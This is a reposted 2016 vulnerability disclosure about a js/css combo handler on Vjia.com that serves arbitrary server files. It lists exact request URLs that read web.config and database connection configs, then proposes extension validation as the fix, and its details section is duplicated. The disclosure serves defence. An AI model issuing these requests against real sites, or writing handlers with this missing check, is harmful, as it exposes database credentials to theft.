神刀安全网

漏洞标题: 凡客旗下Vjia.com js/css combo可读取数据库配置文件

漏洞详情

披露状态:

2016-04-15: 细节已通知厂商并且等待厂商处理中
2016-04-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

在访问凡客商城系统时,发现通过简单方式可查看数据库及站点信息配置文件,可能是由于程序中缺少逻辑判断导致。

详细说明:

在凡客Vjia.com列表页中查看源代码

漏洞标题:  凡客旗下Vjia.com js/css combo可读取数据库配置文件

复制用于js/css combo的URL到地址栏,将href后参数换作web.config

例:http://rscdn.vjia.com/css.ashx?href=web.config

漏洞标题:  凡客旗下Vjia.com js/css combo可读取数据库配置文件

及web.config中的appSettings节点下的配置均可读取

例如:数据库连接字符串

http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/Connection.config

漏洞标题:  凡客旗下Vjia.com js/css combo可读取数据库配置文件

以及更多

http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/Parameters.xml

http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/WebSite.xml

http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/RSConfig.xml

http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/SearchConfig.xml

http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/SolrCoreConfig.xml

http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/CacheConfig.config

http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/SortConfig.xml

可能会被脱裤

漏洞证明:

在凡客Vjia.com列表页中查看源代码

漏洞标题:  凡客旗下Vjia.com js/css combo可读取数据库配置文件

复制用于js/css combo的URL到地址栏,将href后参数换作web.config

例:http://rscdn.vjia.com/css.ashx?href=web.config

漏洞标题:  凡客旗下Vjia.com js/css combo可读取数据库配置文件

及web.config中的appSettings节点下的配置均可读取

例如:数据库连接字符串

http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/Connection.config

漏洞标题:  凡客旗下Vjia.com js/css combo可读取数据库配置文件

以及更多

http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/Parameters.xml

http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/WebSite.xml

http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/RSConfig.xml

http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/SearchConfig.xml

http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/SolrCoreConfig.xml

http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/CacheConfig.config

http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/SortConfig.xml

修复方案:

在css.ashx和js.ashx一般处理程序中加入扩展名校验即可,非js或css文件不执行合并输出

版权声明:转载请注明来源 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 凡客旗下Vjia.com js/css combo可读取数据库配置文件

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址